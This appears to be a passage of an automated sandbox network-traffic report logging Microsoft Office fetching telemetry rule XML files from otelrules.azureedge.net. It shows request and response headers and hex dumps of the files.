                                                                                                                                            2024-10-31 16:13:15 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            98192.168.2.44985513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:15 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1393
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                            x-ms-request-id: b981dc60-601e-0097-7636-29f33a000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161315Z-15b8d89586fmc8ck21zz2rtg1w00000007200000000066ew
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:16 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            99192.168.2.44985613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:16 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:16 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1356
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                            x-ms-request-id: 9667aa6f-a01e-0084-5bc4-2a9ccd000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161316Z-159b85dff8f5bl2qhC1DFWs6cn00000001pg00000000b4q0
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:16 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            100192.168.2.44985713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:16 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1395
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                            x-ms-request-id: d866d412-001e-0028-1c9c-27c49f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161316Z-15b8d89586fwzdd88qtcg4dr1800000001zg000000007g54
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:16 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            101192.168.2.44985813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:16 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:16 UTC538INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1358
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                            x-ms-request-id: 5c8c4e1d-601e-0002-3bca-2aa786000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161316Z-159b85dff8fdjprfhC1DFWuqh000000000m000000000a8u1
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:16 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            102192.168.2.44985913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:16 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:16 UTC538INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1395
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                            x-ms-request-id: f3cd1c79-a01e-0032-01bf-2a1949000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161316Z-159b85dff8f9mtxchC1DFWf9vg000000012000000000en1k
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:16 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            103192.168.2.44986013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:16 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:16 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:16 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1358
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                            x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161316Z-15b8d89586f6nn8zqg1h5suba8000000050g000000009eyh
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:16 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            104192.168.2.44986113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:17 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:17 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:17 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1389
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                            x-ms-request-id: cdbfd92d-501e-0029-317f-27d0b8000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161317Z-16849878b7828dsgct3vrzta70000000082000000000vtvq
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:17 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            105192.168.2.44986313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:17 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:17 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:17 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1405
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                            ETag: "0x8DC582BE12B5C71"
                                                                                                                                            x-ms-request-id: 2e8006eb-901e-0083-471c-26bb55000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161317Z-16849878b78fhxrnedubv5byks0000000850000000005q24
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:17 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            106192.168.2.44986213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:17 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:17 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:17 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1352
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                            ETag: "0x8DC582BE9DEEE28"
                                                                                                                                            x-ms-request-id: 0bafd3b5-501e-0078-0673-2b06cf000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161317Z-15b8d89586fmhjx6a8nf3qm53c00000003r00000000025u8
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:17 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            107192.168.2.44986413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:17 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
